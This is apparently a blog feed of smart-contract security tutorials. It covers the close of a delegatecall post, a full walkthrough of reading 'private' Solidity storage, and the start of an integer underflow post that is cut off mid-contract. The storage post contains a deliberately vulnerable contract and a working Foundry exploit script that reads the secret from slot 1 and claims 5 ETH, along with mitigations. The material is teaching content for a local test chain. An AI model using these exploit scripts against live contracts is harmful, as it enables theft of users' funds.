Introduce a guard that ensures sensitive variables like `masterWizard` can only be updated through explicit functions, not indirectly via `delegatecall`.

```solidity
modifier onlyMasterWizard() {
    require(
        compareStrings(masterWizard, toString(msg.sender)),
        &quot;Access restricted to masterWizard&quot;
    );
    _;
}

function setMasterWizard(string memory newMasterWizard) public onlyMasterWizard {
    masterWizard = newMasterWizard;
}

```

Additionally, critical slots should be locked down by restricting access to functions that directly modify them.

#### **Benefit**

This ensures that even if `delegatecall` is used, sensitive variables like `masterWizard` cannot be tampered with accidentally or maliciously.

### **Bonus Tip: Use Libraries Safely**

For reusable code, prefer Solidity’s native `library` keyword over external contracts. Libraries have no storage of their own, and `internal` library functions are inlined into the calling contract, so no `delegatecall` is involved at all. (Calls to `external` library functions do use `delegatecall` under the hood, but they cannot touch the caller’s state unless storage references are passed in explicitly.)

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```solidity
library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }
}

```
&lt;/details&gt;


#### **Why This Works**

Using native libraries ensures that logic is executed safely within the calling contract’s context, without the risks associated with `delegatecall`.

### **Final Thoughts**

To summarize:

1.  Whitelist trusted libraries to prevent malicious code execution.
2.  Separate storage and logic with proxy patterns for safer upgrades.
3.  Lock down critical storage slots with explicit access controls.

By applying these strategies, you can transform your contract from a vulnerable grimoire into a fortress of well-protected magic. Remember, while `delegatecall` offers great flexibility, it also demands vigilance and robust design to ensure your spells don’t backfire.

# **Conclusions: The Perils and Power of `delegatecall`**

The story of the Magical Grimoire serves as a cautionary tale for developers wielding the incredible yet dangerous tool that is `delegatecall`. While its ability to enable upgradable contracts and reusable logic is undeniable, its misuse can open doors to catastrophic vulnerabilities.

Here’s what we’ve learned:

1.  **Flexibility Comes with Risks:** `delegatecall` operates directly on the calling contract’s storage, making it susceptible to unintended overwrites and malicious manipulation. The lack of built-in safeguards means developers must enforce strict controls on how it’s used.
2.  **Blind Trust Can Backfire:** In our example, trusting the SpellLibrary without restrictions allowed attackers to exploit the contract’s design, showcasing how a single oversight can compromise an entire system.
3.  **Mitigation is Possible:** By implementing strategies like trusted libraries, separating storage and logic, and locking down critical variables, developers can mitigate these risks while still benefiting from `delegatecall`.

Ultimately, `delegatecall` is not inherently bad—it’s a tool, and like any tool, it’s only as safe as the person using it. With proper precautions, you can harness its power to create dynamic, efficient, and upgradeable contracts without fear of leaving your project open to exploits.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Understanding `delegatecall` and Low-Level Functions. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call](https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call)
-   **Trail of Bits** - Common Pitfalls with `delegatecall`. &quot;Trail of Bits Blog.&quot; Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
-   **Storage in Solidity** - Detailed Analysis of Solidity Storage Mechanics. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/latest/internals/layout\_in\_storage.html](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. &quot;Anvil Documentation.&quot; Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)</content:encoded><author>Ruben Santos</author></item><item><title>Secrets in the Open: Unpacking Solidity Storage Vulnerabilities</title><link>https://www.kayssel.com/post/web3-9</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-9</guid><description>This chapter explores Solidity&apos;s storage vulnerabilities, showcasing how attackers exploit them and proposing solutions like hashing, off-chain storage, and dynamic secrets to secure smart contracts.</description><pubDate>Sun, 05 Jan 2025 11:33:40 GMT</pubDate><content:encoded># Introduction

In the magical land of blockchain, where smart contracts are the enchanted scrolls that power decentralized kingdoms, a question looms large: how do you keep a secret in a world where everyone can see everything? Enter the **SecretOfEryndor**, a fictional treasure chest with a clever twist—anyone who guesses the secret code unlocks 5 ETH. But here’s the catch: the chest is made of glass, and the code is scribbled inside for anyone curious enough to look.

Solidity’s storage system is like a spellbook written in invisible ink—visible to all who know how to read it. Even variables marked `private` are only private at the surface level. Beneath the transparency that makes blockchain trustworthy lies a paradox: the very openness that ensures decentralization also exposes secrets to potential exploits.

In this chapter, we’ll channel our inner adventurers and dive into the mechanics of Solidity’s storage. We’ll deploy the SecretOfEryndor contract, uncover how its vulnerabilities allow anyone to retrieve its hidden secret, and use Foundry’s scripting magic to execute an exploit step by step. Along the way, we’ll learn how to fortify contracts against prying eyes with techniques like hashing sensitive data, off-chain storage, and dynamic secrets. Ready to uncover the tricks hidden in the blockchain’s spellbook? Let’s begin the quest! 🗺️

# **Deep Dive into Solidity Storage Mechanics**

If Solidity storage were a physical space, it’d be a vast library of lockers—each one perfectly labeled and organized but with glass doors, so anyone can peek inside. This deterministic and efficient system ensures that smart contracts can quickly retrieve and update data. But it’s also the reason attackers know exactly where to look when they want to steal your secrets. Let’s grab a flashlight and explore these lockers more closely to see how they’re organized and what makes them vulnerable.

#### **The Slot System: A Perfectly Organized Locker Room**

In Solidity, storage is divided into 32-byte slots, each one numbered sequentially starting from zero. Every variable in your contract gets its own slot (or shares one, in the case of smaller variables). Here’s how Solidity assigns these lockers:

-   **Single Variables:** Larger data types like `uint256`, `address`, or `bool` are stored in their own slots.
-   **Packed Variables:** Smaller types like `uint8` or `bool` are crammed into a single slot like roommates in a dorm. Solidity is efficient that way, but this packing can cause issues if you’re not careful.

&lt;details&gt;
&lt;summary&gt;Take this example:&lt;/summary&gt;

```solidity
contract PackedStorage {
    uint8 public a;      // Stored in the first byte of slot 0
    uint8 public b;      // Stored in the second byte of slot 0
    uint256 public c;    // Stored in slot 1
}

```
&lt;/details&gt;


Here, `a` and `b` share slot `0`, snugly packed like Tetris blocks, while `c` stretches out in its own personal slot, slot `1`. This packing reduces costs but makes updates tricky—change one variable without care, and you might accidentally overwrite the other.
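
The roommate problem can be demonstrated with a raw slot write (the inline assembly here is purely illustrative -- normal Solidity assignments mask correctly, but low-level writes do not):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract PackedOverwrite {
    uint8 public a; // byte 0 of slot 0
    uint8 public b; // byte 1 of slot 0

    function setBoth() public {
        a = 1;
        b = 2;
    }

    // Writing a full 32-byte word replaces EVERY variable packed into slot 0
    function rawWrite(bytes32 word) public {
        assembly {
            sstore(0, word)
        }
    }
}
```

After `setBoth()`, calling `rawWrite(bytes32(uint256(7)))` leaves `a == 7` and `b == 0`: the whole-word write silently zeroed `b`. This is exactly why careless updates to packed slots are dangerous.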

#### **Dynamic Data Types: The Wanderers of Storage**

Dynamic types like arrays, mappings, and strings are more adventurous. Instead of settling in a single slot, they use their base slot as a starting point and then branch out. Think of them as storing their metadata (like an index or a map) in one locker while their actual data goes to a separate, secret hideaway.

**Arrays:** Solidity stores the length of the array in its base slot. The actual data? That’s off on its own, starting at a hashed location derived from the base slot.

```solidity
contract ArrayExample {
    uint256[] public numbers; // Length stored in slot 0
}

```

In this case, `numbers.length` is in slot `0`, but the array’s elements live contiguously starting at `keccak256(abi.encode(0))`. If your array grows, it just keeps filling up lockers sequentially from that starting point.
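
More precisely, element `i` of a dynamic array based at slot `p` lives at `keccak256(abi.encode(p)) + i`. A small sketch of that computation:

```solidity
// Sketch: storage slot of numbers[i] for an array declared at baseSlot
function arrayElementSlot(uint256 baseSlot, uint256 i) pure returns (bytes32) {
    return bytes32(uint256(keccak256(abi.encode(baseSlot))) + i);
}
```

Free functions like this are valid at file level in Solidity 0.7.1 and later; inside a contract, mark the function `internal` instead.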

**Mappings:**  
Mappings use a similar hashing mechanism but include the key in the hash. For each key-value pair, Solidity computes the storage slot as `keccak256(abi.encode(key, slot))`, with both the key and the slot number left-padded to 32 bytes (note: `abi.encode`, not `abi.encodePacked`).

```solidity
contract MappingExample {
    mapping(address =&gt; uint256) public balances; // Base slot at 0
}

```

For `balances`, the value associated with an address is stored at a location derived from the hash of the address and the base slot. For instance, if the base slot is `0` and the key is an Ethereum address, the storage location is:

```solidity
keccak256(abi.encode(address, 0))

```
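
As a concrete sketch, the slot holding `balances[user]` can be computed like this (for value-type keys, Solidity left-pads each component to 32 bytes, which is what `abi.encode` produces):

```solidity
// Sketch: storage slot of balances[user] for a mapping declared at baseSlot
function mappingValueSlot(address user, uint256 baseSlot) pure returns (bytes32) {
    return keccak256(abi.encode(user, baseSlot));
}
```

Feeding the result to `cast storage` returns the raw balance, `private` or not.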

#### **Strings and Bytes**

Strings and dynamic byte arrays have a dual personality. If the content is short (≤31 bytes), it’s stored directly in the slot along with its length. But for longer content, Solidity keeps the metadata in the slot and shuffles the actual data to a hashed location.

Here’s how a short string like `&quot;Hello&quot;` and a longer one like `&quot;A very long secret message&quot;` are stored:

```solidity
contract StringExample {
    string public message; // Slot 0 for metadata
}

```

-   `&quot;Hello&quot;` fits snugly into slot `0` with its length embedded.
-   `&quot;A very long secret message&quot;` keeps its metadata in slot `0`, but its content moves to `keccak256(0)`.
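
The short-string layout can be modeled directly. Per Solidity's storage rules, a string of 31 bytes or fewer lives left-aligned in its slot, with `length * 2` stored in the lowest-order byte (the even value is what marks it as short). A minimal sketch:

```python
def short_string_slot(s):
    # Build the 32-byte slot for a short Solidity string:
    # data left-aligned, zero padding, then length * 2 in the last byte.
    data = s.encode()
    if len(data) > 31:
        raise ValueError("long strings store their data at keccak256(slot)")
    return data + bytes(31 - len(data)) + bytes([len(data) * 2])

```

For `Hello` this yields the five ASCII bytes, 26 zero bytes, and a final byte of `10`.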

#### **The Glass Door Problem**

Now, here’s where things get practical. To query the storage of a contract and retrieve specific data, tools like **cast** make it straightforward. Even variables marked as `private` can be accessed by simply specifying the contract address and the storage slot you want to inspect:

```bash
cast storage &lt;CONTRACT_ADDRESS&gt; &lt;SLOT_INDEX&gt;

```

Now that we’ve unpacked the mechanics of Solidity’s storage, let’s put this knowledge into practice by examining a vulnerable contract 😋

# Vulnerable Smart Contract

The **SecretOfEryndor** contract is designed with a seemingly straightforward purpose: to reward users who correctly guess a secret code with 5 ETH. The contract owner retains control over its funds and can withdraw the remaining balance when needed.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract SecretOfEryndor {
    uint256 public creationTime; // Slot 0: A timestamp for when the contract was created
    string private secret; // Slot 1: The &quot;hidden&quot; secret code of the magical relic
    address public creator; // Slot 2: The address of the creator
    bool public isActive; // Slot 3: A flag to indicate if the contract is active
    uint8 public version; // Slot 3 (packed with `isActive`)

    // Constructor to initialize the contract
    constructor(string memory _secret) payable {
        require(
            msg.value &gt;= 5 ether,
            &quot;Contract must be funded with at least 5 ETH&quot;
        );
        creationTime = block.timestamp;
        secret = _secret;
        creator = msg.sender;
        isActive = true;
        version = 1;
    }

    // Function to guess the secret and claim 5 ETH if correct
    function guessSecret(string memory _guess) public {
        require(address(this).balance &gt;= 5 ether, &quot;Contract is out of funds&quot;);
        require(
            keccak256(abi.encodePacked(_guess)) ==
                keccak256(abi.encodePacked(secret)),
            &quot;Incorrect secret&quot;
        );

        // Send 5 ETH to the caller
        (bool success, ) = msg.sender.call{value: 5 ether}(&quot;&quot;);
        require(success, &quot;Transfer failed&quot;);
    }

    // Function to allow the creator to withdraw remaining funds
    function withdraw() public {
        require(msg.sender == creator, &quot;Only the creator can withdraw funds&quot;);
        require(address(this).balance &gt; 0, &quot;No funds to withdraw&quot;);

        (bool success, ) = creator.call{value: address(this).balance}(&quot;&quot;);
        require(success, &quot;Withdrawal failed&quot;);
    }

    // Function to deposit additional funds into the contract
    function fundContract() public payable {
        require(msg.value &gt; 0, &quot;Must send some ether&quot;);
    }
}

```
&lt;/details&gt;


The contract begins with five state variables, each playing a distinct role. The `creationTime` variable logs the timestamp of the contract’s deployment, providing a historical anchor for its initialization. The `secret` variable stores the private code that users must guess to claim the reward. The `creator` variable records the Ethereum address of the contract’s deployer, granting them administrative authority. Finally, the `isActive` and `version` variables manage the contract’s operational status and versioning, sharing the same storage slot for efficiency.

```solidity
uint256 public creationTime; // Slot 0: Timestamp of contract creation  
string private secret;       // Slot 1: The hidden secret  
address public creator;      // Slot 2: Address of the creator  
bool public isActive;        // Slot 3 (shared): Contract status flag  
uint8 public version;        // Slot 3 (shared): Contract version  

```

The constructor initializes these variables and ensures the contract is adequately funded. It requires a deposit of at least 5 ETH upon deployment, assigns the deployer’s address as the `creator`, sets the contract to active, and marks the version as one. This setup establishes the contract’s operational foundation.

```solidity
constructor(string memory _secret) payable {  
    require(msg.value &gt;= 5 ether, &quot;Contract must be funded with at least 5 ETH&quot;);  
    creationTime = block.timestamp;  
    secret = _secret;  
    creator = msg.sender;  
    isActive = true;  
    version = 1;  
}  

```

The `guessSecret` function is the contract’s centerpiece, allowing users to guess the secret code. If the guess is correct, the contract sends 5 ETH to the caller. The function first checks that the contract holds sufficient funds and then compares the keccak256 hash of the submitted guess against the hash of the stored secret. Note that hashing here is simply how Solidity compares strings of arbitrary length; it does nothing to hide the secret, which still sits readable in storage.

```solidity
function guessSecret(string memory _guess) public {  
    require(address(this).balance &gt;= 5 ether, &quot;Contract is out of funds&quot;);  
    require(  
        keccak256(abi.encodePacked(_guess)) == keccak256(abi.encodePacked(secret)),  
        &quot;Incorrect secret&quot;  
    );  

    (bool success, ) = msg.sender.call{value: 5 ether}(&quot;&quot;);  
    require(success, &quot;Transfer failed&quot;);  
}  

```

For fund management, the `withdraw` function allows the creator to withdraw all remaining Ether in the contract. This function ensures only the creator can execute it and that the contract has a positive balance before proceeding.

```solidity
function withdraw() public {  
    require(msg.sender == creator, &quot;Only the creator can withdraw funds&quot;);  
    require(address(this).balance &gt; 0, &quot;No funds to withdraw&quot;);  

    (bool success, ) = creator.call{value: address(this).balance}(&quot;&quot;);  
    require(success, &quot;Withdrawal failed&quot;);  
}  

```

Additionally, the `fundContract` function provides a way for anyone to deposit additional Ether into the contract, ensuring the reward pool can be replenished as needed.

```solidity
function fundContract() public payable {  
    require(msg.value &gt; 0, &quot;Must send some ether&quot;);  
}  

```

The contract’s storage layout organizes these variables predictably. The `creationTime` is stored in slot `0`, while the `secret` metadata resides in slot `1`. If the secret exceeds 31 bytes, its content is stored at a hashed location derived from slot `1`. The `creator` address is in slot `2`, and the `isActive` and `version` variables share slot `3`.

# **Deploying the Contract: Foundry Scripts in Action**

Today, we’ll take a different approach to deploying the vulnerable contract by using [Foundry’s powerful scripting capabilities.](https://book.getfoundry.sh/tutorials/solidity-scripting)

&lt;details&gt;
&lt;summary&gt;Deployment Script&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/SecretOfEryndor.sol&quot;;

contract DeployScript is Script {
    function run() external {
        string memory secret = &quot;SuperSecureSecret1234!&quot;;
        uint256 fundingAmount = 100 ether; // Initial funding (well above the 5 ETH minimum)

        // Start broadcasting the transaction
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Deploy the contract with the secret and funding
        SecretOfEryndor deployedContract = (new SecretOfEryndor){
            value: fundingAmount
        }(secret);

        // Log the deployed contract&apos;s address
        console.log(&quot;Deployed SecretOfEryndor at:&quot;, address(deployedContract));

        vm.stopBroadcast();
    }
}

```
&lt;/details&gt;


The script begins by defining the deployment parameters. The `secret` variable holds the secret code required to claim the reward, and the `fundingAmount` sets the Ether balance transferred to the contract during deployment. These ensure the contract is correctly initialized and operational.

```solidity
string memory secret = &quot;SuperSecureSecret1234!&quot;;
uint256 fundingAmount = 100 ether; // Initial funding (well above the 5 ETH minimum)

```

The `run` function, executed by Foundry during deployment, reads the deployer’s private key from an environment variable. For this proof of concept we keep the keys in a `.env` file, a common convention for local development (never do this with production keys). The call to `vm.startBroadcast` signals that all subsequent transactions are signed and sent to the network.

```solidity
vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

```

The actual contract deployment occurs using the `new` keyword, with the `value` parameter specifying the Ether sent during initialization. This step deploys the **SecretOfEryndor** contract with the secret and funding amount provided.

```solidity
SecretOfEryndor deployedContract = (new SecretOfEryndor){
    value: fundingAmount
}(secret);

```

Once deployed, the contract’s address is logged to the console for easy reference. This enables immediate interaction with the contract in the test environment.

```solidity
console.log(&quot;Deployed SecretOfEryndor at:&quot;, address(deployedContract));

```

The deployment process is finalized with a call to `vm.stopBroadcast`, ensuring that all broadcasted transactions are completed.

```solidity
vm.stopBroadcast();

```

To execute this script, we’ll start by setting up the environment. The RPC URL for the Anvil local blockchain is defined in the `foundry.toml` configuration file, while the private keys for both the administrator and the attacker live in the `.env` file. These keys allow the script to access the respective accounts during deployment and testing. Once the setup is complete, the script can be executed using Foundry’s `forge script` command. Upon successful deployment, the contract’s address is displayed in the console, ready for testing and further interaction.

![](/content/images/2025/01/image-1.png)

foundry.toml

![](/content/images/2025/01/image-2.png)

Private keys of the owner and the attacker

![](/content/images/2025/01/image-3.png)

Contract&apos;s deployment

# **Executing the Exploit: Using Foundry Scripts**

To demonstrate the vulnerabilities of the **SecretOfEryndor** contract, we will perform an exploit using Foundry’s scripting capabilities.

&lt;details&gt;
&lt;summary&gt;Exploit Code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;forge-std/console.sol&quot;;

interface ISecretOfEryndor {
    function guessSecret(string memory _code) external;
}

contract RevealAndAttack is Script {
    function run() external {
        address contractAddress = 0x5FbDB2315678afecb367f032d93F642f64180aa3; // Replace with your deployed contract address
        uint256 slot = 1; // Slot 1: Where the `secret` is stored

        // Step 1: Query the attacker&apos;s balance before the attack
        address attacker = vm.addr(vm.envUint(&quot;ATTACKER_KEY&quot;));
        console.log(
            &quot;Attacker&apos;s initial balance (ETH):&quot;,
            attacker.balance / 1 ether
        );

        // Step 2: Query the storage slot to retrieve the raw secret
        bytes32 rawSecret = vm.load(contractAddress, bytes32(slot));
        console.logBytes32(rawSecret);

        // Step 3: Decode the secret and trim trailing null characters
        string memory decodedSecret = _bytes32ToString(rawSecret);
        console.log(&quot;Decoded Secret:&quot;, decodedSecret);

        // Step 4: Call the `guessSecret` function with the decoded secret
        vm.startBroadcast(vm.envUint(&quot;ATTACKER_KEY&quot;));
        ISecretOfEryndor(contractAddress).guessSecret(decodedSecret);
        vm.stopBroadcast();

        // Step 5: Query the attacker&apos;s balance after the attack
        console.log(
            &quot;Attacker&apos;s final balance (ETH):&quot;,
            attacker.balance / 1 ether
        );
    }

    // Helper function to trim padding and convert bytes32 to string
    function _bytes32ToString(
        bytes32 _data
    ) internal pure returns (string memory) {
        uint256 length = 0;
        while (length &lt; 32 &amp;&amp; _data[length] != 0) {
            length++;
        }
        bytes memory result = new bytes(length);
        for (uint256 i = 0; i &lt; length; i++) {
            result[i] = _data[i];
        }
        return string(result);
    }
}

```
&lt;/details&gt;


The first step is querying the attacker’s initial balance. Using Foundry’s `vm` utility, the script retrieves the attacker’s address and logs their current Ether holdings. This provides a baseline for assessing the impact of the exploit.

```solidity
address attacker = vm.addr(vm.envUint(&quot;ATTACKER_KEY&quot;));
console.log(&quot;Attacker&apos;s initial balance (ETH):&quot;, attacker.balance / 1 ether);

```

Next, the script targets the storage slot where the secret is stored. Since the contract’s layout is predictable, the secret resides in slot `1`. Using `vm.load`, the script retrieves the raw secret value directly from the blockchain’s storage.

```solidity
bytes32 rawSecret = vm.load(contractAddress, bytes32(slot));
console.logBytes32(rawSecret);

```

After extracting the raw secret, it is converted into a readable format. The `_bytes32ToString` helper function decodes the bytes and trims the trailing zero padding, revealing the actual secret. This works only because the secret fits within a single slot; a string of 32 bytes or more would keep just its length in slot `1` and store its content starting at `keccak256(1)`.

```solidity
string memory decodedSecret = _bytes32ToString(rawSecret);
console.log(&quot;Decoded Secret:&quot;, decodedSecret);

```
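
The trimming logic translates to one line outside Solidity. This Python sketch mirrors `_bytes32ToString`: it keeps everything before the first zero byte, which for a short Solidity string drops both the zero padding and the trailing length byte.

```python
def bytes32_to_string(raw):
    # bytes(1) is a single zero byte; everything before the first zero
    # byte is the content of a short (under 32 bytes) Solidity string.
    return raw.split(bytes(1))[0].decode()

```

Like the Solidity helper, this only works because the secret is shorter than 32 bytes; a longer string would store its content at `keccak256(1)` instead.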

With the secret in hand, the attacker proceeds to exploit the contract. Broadcasting a transaction signed with the attacker’s private key, the script calls the `guessSecret` function using the decoded secret. This triggers the reward mechanism, transferring 5 ETH from the contract to the attacker.

```solidity
vm.startBroadcast(vm.envUint(&quot;ATTACKER_KEY&quot;));
ISecretOfEryndor(contractAddress).guessSecret(decodedSecret);
vm.stopBroadcast();

```

Finally, the script checks the attacker’s balance again to verify the success of the exploit. The difference in the balance confirms that the contract’s funds have been transferred.

```solidity
console.log(&quot;Attacker&apos;s final balance (ETH):&quot;, attacker.balance / 1 ether);

```

![](/content/images/2025/01/image-4.png)

Running the exploit

# **Top Three Solutions to Mitigate Storage Vulnerabilities**

Storing sensitive data directly on-chain poses significant risks, as attackers can query storage slots to extract private information, even if marked as `private`. However, these risks can be addressed with thoughtful design and best practices. Here are three primary solutions we recommend to mitigate such vulnerabilities effectively.

#### **1\. Hash Sensitive Data Before Storing It**

Instead of storing plaintext values like passwords or secrets directly in storage, store their hashed representations. Hashing is a one-way operation, making it computationally infeasible for an attacker to reverse-engineer the original value from the hash.

For example, use Solidity’s `keccak256` hashing function to hash the secret before storing it:

```solidity
bytes32 private hashedSecret;

constructor(string memory _secret) {
    hashedSecret = keccak256(abi.encodePacked(_secret));
}

```

When a user submits their guess, hash the input and compare it to the stored hash:

```solidity
function guessSecret(string memory _guess) public {
    require(keccak256(abi.encodePacked(_guess)) == hashedSecret, &quot;Incorrect secret&quot;);
}

```

#### **2\. Use Off-Chain Storage for Critical Data**

To completely avoid exposing sensitive data on-chain, store critical information off-chain. The blockchain can then store a reference to this data, such as a hash or unique identifier, which can be verified without revealing the actual content.

For example, instead of storing the secret on-chain, save it in a secure database or an off-chain decentralized storage system like IPFS. Then, use a hash of the secret for on-chain verification:

```solidity
bytes32 public secretHash;

constructor(bytes32 _secretHash) {
    secretHash = _secretHash;
}

```

#### **3\. Dynamically Generate Secrets**

Static secrets are inherently risky, as they remain constant and predictable. Instead, use dynamic, context-sensitive values that are generated based on factors like user addresses, timestamps, or random values. This approach ensures that secrets are unique for each interaction and cannot be precomputed or extracted.

For instance, you can combine a user’s address and a nonce to create a dynamic secret:

```solidity
function generateSecret(address user, uint256 nonce) internal pure returns (bytes32) {
    return keccak256(abi.encodePacked(user, nonce));
}

```

# **Conclusion**

This article explored how Solidity’s storage system, while efficient and predictable, can also expose smart contracts to critical vulnerabilities. Through the **SecretOfEryndor** contract, we saw how attackers can exploit the transparent nature of blockchain to retrieve sensitive information and execute exploits.

Using Foundry scripts, we demonstrated how to deploy and test contracts in a controlled environment, uncovering weaknesses and turning theoretical risks into practical insights. Finally, we examined effective solutions, like hashing sensitive data, utilizing off-chain storage, and dynamically generating secrets, to mitigate these vulnerabilities.

Blockchain&apos;s transparency is both a feature and a challenge, but with thoughtful design and the right tools, developers can build smart contracts that are secure, robust, and trustworthy. Now, it’s your turn to apply these lessons and take your blockchain projects to the next level.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. _&quot;Foundry Documentation.&quot;_ Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Language for Smart Contract Development. _&quot;Solidity Documentation.&quot;_ Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. _&quot;OpenZeppelin Contracts Documentation.&quot;_ Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. _&quot;Ethereum Whitepaper.&quot;_ Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. _&quot;Anvil Documentation.&quot;_ Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
-   **Etherscan** - Ethereum Block Explorer and Analytics Platform. _&quot;Etherscan Documentation.&quot;_ Available at: [https://etherscan.io/](https://etherscan.io/)
-   **Cast** - Interacting with Smart Contracts and Ethereum Nodes. _&quot;Foundry Documentation.&quot;_ Available at: [https://book.getfoundry.sh/reference/cast/](https://book.getfoundry.sh/reference/cast/)
-   **Blockchain Security** - Understanding and Mitigating Vulnerabilities in Smart Contracts. _&quot;Trail of Bits Blog.&quot;_ Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
-   **Storage in Solidity** - Detailed Analysis of Solidity Storage Mechanics. _&quot;Solidity Documentation.&quot;_ Available at: [https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html)</content:encoded><author>Ruben Santos</author></item><item><title>Breaking the Bank: Exploiting Integer Underflow in Smart Contracts</title><link>https://www.kayssel.com/post/web3-8</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-8</guid><description>This chapter explores an integer underflow vulnerability in the DecentralizedBank contract. Using Anvil and a Bash script, we simulate an attack where the attacker inflates their balance due to a logic flaw and withdraws 5 ETH, showcasing the importance of proper validation in smart contracts.</description><pubDate>Sun, 29 Dec 2024 11:09:00 GMT</pubDate><content:encoded># Introduction

Imagine walking into a bank with just a penny in your pocket and somehow walking out a billionaire thanks to a small glitch in their system. Sounds like the plot of a sci-fi movie, right? But in the world of smart contracts, vulnerabilities like **integer underflow** make similar scenarios possible. While modern versions of Solidity (starting from 0.8.0) have largely addressed these issues, older contracts remain vulnerable, and understanding these risks is critical for anyone working with decentralized systems.

In this chapter, we’ll take a deep dive into how underflow attacks work. Using **Anvil** to create a controlled testing environment, we’ll explore the weaknesses of a contract called **DecentralizedBank**. Step by step, we’ll show how a simple flaw in its withdrawal logic can be exploited to turn a small deposit into a fortune—and ultimately drain the contract. Ready to uncover how this classic vulnerability unfolds? Let’s get started.

# What is an Integer Overflow?

To understand this vulnerability, think of a clock with numbers from 1 to 12. If the time is 12 and you add one more hour, instead of reaching 13, it wraps back to 1. This “wrap-around” behavior is a great analogy for what happens during an integer overflow in programming.

In Solidity, integers have fixed limits. For example, a `uint8` can store numbers between 0 and 255. If you try to add 1 to 255, instead of resulting in 256, the value “wraps around” to 0. The mirror image, an integer **underflow**, happens on subtraction: take 1 away from 0 and a `uint8` wraps up to 255. Before Solidity 0.8.0, both happened silently, which can have serious implications, especially in financial applications where precision is critical.

Here’s an example in Solidity to demonstrate:

```solidity
uint8 public counter = 255;

function increment() public {
    counter += 1; // Overflow occurs, and counter becomes 0.
}

```
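
Since the EVM works modulo the type’s width, unchecked arithmetic is just modular arithmetic. A quick Python model of the `uint8` counter above:

```python
def add_uint8(x, y):
    # Unchecked uint8 addition wraps modulo 2**8, as in Solidity before 0.8.0
    return (x + y) % 2**8

```

Incrementing a counter of 255 lands back at 0, exactly the wrap-around the clock analogy describes.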

Now imagine this happening in a bank. You request to withdraw $1,001, but their system can only count up to $1,000. Instead of rejecting your request, the system wraps around and gives you just $1—or, in the case of a savvy attacker, much more than intended.

When this occurs in smart contracts, it can lead to major problems:

-   **Fake balances:** Attackers might manipulate the system to believe they own far more than they actually do.
-   **Broken rules:** Constraints like “you can only withdraw what you’ve deposited” can be bypassed.
-   **Excessive payouts:** Contracts may accidentally reward users far beyond what’s reasonable.

Understanding this vulnerability is key to protecting your smart contracts. Now that we’ve broken down the concept, let’s dive into a practical example and see how this issue can be exploited.

# Vulnerable Smart Contract

At first glance, the **DecentralizedBank** contract looks simple and functional. Users can deposit Ether, withdraw it later, and their balances are recorded in a public ledger. Straightforward, right? But hiding under this apparent simplicity is a critical vulnerability that can leave the contract wide open to exploitation.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

// Contract for a decentralized bank
contract DecentralizedBank {
    // Mapping to store user deposits, linking an address to its balance
    mapping(address =&gt; uint256) public deposits;

    // Address of the contract owner (the account that deployed the contract)
    address public owner;

    // Event emitted when a user makes a deposit
    event DepositMade(address indexed user, uint256 amount);

    // Event emitted when a user makes a withdrawal
    event WithdrawalMade(address indexed user, uint256 amount);

    // Constructor to set the contract owner at the time of deployment
    constructor() public {
        owner = msg.sender; // The deployer&apos;s address is stored as the owner
    }

    // Function to allow users to deposit Ether into the contract
    function deposit() public payable {
        // Ensure the deposit amount is greater than zero
        require(msg.value &gt; 0, &quot;Deposit must be greater than 0&quot;);

        // Add the deposit amount to the user&apos;s balance
        deposits[msg.sender] += msg.value;

        // Emit a DepositMade event for tracking
        emit DepositMade(msg.sender, msg.value);
    }

    // Function to allow users to withdraw a specific amount of Ether
    function withdraw(uint256 amount) public {
        // Deduct the requested amount from the user&apos;s balance
        deposits[msg.sender] -= amount;

        // Transfer the requested amount to the user&apos;s address
        (bool sent, ) = msg.sender.call{value: amount}(&quot;&quot;);
        // Ensure the transfer was successful
